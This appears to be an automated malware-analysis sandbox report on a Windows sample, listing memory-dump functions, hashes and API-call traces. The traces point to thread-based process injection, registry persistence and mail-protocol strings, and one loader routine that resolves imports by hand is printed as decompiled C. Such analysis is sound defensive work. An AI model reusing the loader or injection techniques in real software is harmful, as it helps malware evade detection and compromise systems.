  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DAFC4, Relevance: 13.8, APIs: 9, Instructions: 278 Total matches: 59memorythread
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CAC3A, Relevance: 13.6, APIs: 9, Instructions: 124 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB593, Relevance: 13.6, APIs: 9, Instructions: 115 Total matches: 61memorystring
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4CEB, Relevance: 13.6, APIs: 9, Instructions: 94 Total matches: 33filememorystring
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C164D, Relevance: 13.6, APIs: 9, Instructions: 89 Total matches: 49memoryregistrystring
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB978, Relevance: 13.6, APIs: 9, Instructions: 82 Total matches: 110file
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DC371, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109 Total matches: 97threadsynchronizationinjection
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3996, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 105 Total matches: 51registryfilememory
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143librarystringloader
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}





















0x00401389
0x00401389
0x00401390
0x00401395
0x0040139d
0x0040147b
0x00401483
0x00401483
0x004013a3
0x004013a5
0x004013aa
0x00000000
0x00000000
0x004013b2
0x004013b2
0x004013b6
0x004013be
0x004013c2
0x00000000
0x00000000
0x004013d3
0x004013d8
0x004013da
0x004013dd
0x004013e2
0x004013ea
0x004013ea
0x004013ed
0x004013f1
0x00401461
0x00401461
0x00401464
0x00401469
0x00000000
0x00000000
0x00401479
0x00000000
0x0040147a
0x004013f7
0x004013fb
0x00000000
0x004013fd
0x004013fd
0x00401405
0x00401414
0x00401414
0x004013ff
0x004013ff
0x004013ff
0x00401416
0x00401416
0x0040141e
0x00401426
0x0040142a
0x00000000
0x00000000
0x0040142e
0x0040143b
0x00401440
0x00401440
0x0040144b
0x0040144e
0x00401451
0x00401455
0x00000000
0x00401457
0x00000000
0x00401457
0x00401459
0x00401459
0x00000000
0x00401459
0x004013e6
0x004013e8
0x00000000
0x00000000
0x00000000
0x004013e8
0x00401471
0x00000000

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,004015E0,?), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,004015E0,?), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,004015E0,?), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001C1B85, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 79 Total matches: 31memoryfilestring
Similarity
  • Total matches: 31
  • API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy
  • String ID: \sols
  • API String ID: 2898405644-25449109
  • Opcode ID: 5497166955076156837619a2a098418b7cb76563a9d137fec855e451e2c56df1
  • Instruction ID: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
  • Opcode Fuzzy Hash: F2E0ABB50504208B9013D4B671183389C4698102F219D4511FB06BC48FAFD302A5FB6E
  • Instruction Fuzzy Hash: 44ec2210092a92e039f9b1496625380036570e436bac4a4be39adbf8d21673e3
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
  • lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
  • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C27F6, Relevance: 12.1, APIs: 8, Instructions: 52 Total matches: 80registry
Similarity
  • Total matches: 80
  • API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey
  • String ID:
  • API String ID: 3239362136-0
  • Opcode ID: 43d6ef705f251b34ef39b149b3ea3bd8fb900b51b25fecf4a76b54cbc8c7a116
  • Instruction ID: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
  • Opcode Fuzzy Hash: 4CD0C2B8000985CF04479878487AAFFEA01BEC21C155C5A72F9C06824F769172DF0B6B
  • Instruction Fuzzy Hash: 43568bf06b197137d00305a6dda9a24464bc0a833492d0823832902715db9840
APIs
  • OpenProcess.KERNEL32(00000040,00000000,?), ref: 001C2802
  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 001C2820
  • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C2828
  • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 001C2846
  • GetLastError.KERNEL32 ref: 001C285A
  • RegCloseKey.ADVAPI32(?), ref: 001C2865
  • CloseHandle.KERNEL32(00000000), ref: 001C286C
  • GetLastError.KERNEL32 ref: 001C2874
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCEC, Relevance: 10.7, APIs: 7, Instructions: 161 Total matches: 54memorythreadsleep
Similarity
  • Total matches: 54
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset
  • String ID:
  • API String ID: 2472442912-0
  • Opcode ID: dc49271e526c1696018041de0017b0827111101275221657691e75393d626545
  • Instruction ID: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
  • Opcode Fuzzy Hash: AA11AD32257B7013C12B648249A877EFA85F7420DBC8C7610FAA43906D1F4792D05F7A
  • Instruction Fuzzy Hash: a1ba47e9cb500db2a87726f60fc19047a378d35199e4f4ec398e997f9554d1b5
APIs
  • RtlAllocateHeap.NTDLL ref: 001CDD25
  • memset.NTDLL ref: 001CDD39
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
